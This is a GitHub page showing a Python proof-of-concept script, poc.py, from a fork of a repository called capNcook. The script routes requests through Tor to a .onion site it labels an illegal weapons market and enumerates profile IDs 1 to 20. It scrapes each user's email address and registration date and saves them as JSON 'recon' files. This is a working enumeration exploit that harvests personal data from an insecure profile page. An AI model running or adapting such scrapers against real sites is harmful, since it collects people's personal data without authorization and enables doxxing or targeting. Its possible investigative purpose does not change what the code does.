forked from hoodietramp/capNcook
-
Notifications
You must be signed in to change notification settings - Fork 0
/
poc.py
executable file
·67 lines (54 loc) · 2.3 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import requests
import json
from bs4 import BeautifulSoup
import os
# Function to fetch user profile data and save it to a file
def fetch_user_data_and_save(onion_link, index, output_dir):
url = f'http://{onion_link}/profile.php?id={index}'
# Configure the proxy to route requests through Tor
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
response = requests.get(url, proxies=proxies)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
data_dict = {
"Email": "",
"RegistrationDate": ""
}
# Find email and registration date based on HTML structure
for td in soup.find_all('td', class_='left'):
lines = td.get_text().strip().split('\n')
for line in lines:
if "Email:" in line:
data_dict["Email"] = line.split("Email:")[1].strip()
elif "This user was registred on" in line:
data_dict["RegistrationDate"] = line.split("on")[1].strip()
# Create a JSON string
json_data = json.dumps(data_dict, indent=4)
# Save JSON data to a file
output_file = os.path.join(output_dir, f'recon{index}.json')
with open(output_file, 'w') as json_file:
json_file.write(json_data)
print(f"JSON response saved to '{output_file}'")
return output_file
else:
print(f"Request for ID {index} failed with status code:", response.status_code)
return None
# Onion link and output directory
onion_link = "gunsganos2raowan5y2nkblujnmza32v2cwkdgy6okciskzabchx4iqd.onion"
os.system("echo 'gunsganos2raowan5y2nkblujnmza32v2cwkdgy6okciskzabchx4iqd.onion ; Guns & Ganja - Buy Illegal Weapons [ Verified Vendors ]' | lolcat")
output_dir = 'json_response'
os.makedirs(output_dir, exist_ok=True)
# List to store response files
response_files = []
# Loop through IDs from 1 to 20 and fetch user data
for index in range(1, 21):
response_file = fetch_user_data_and_save(onion_link, index, output_dir)
if response_file:
response_files.append(response_file)
# Display the JSON content in the terminal using cat and jq
if response_files:
cat_command = f"cat {' '.join(response_files)} | jq"
os.system(cat_command)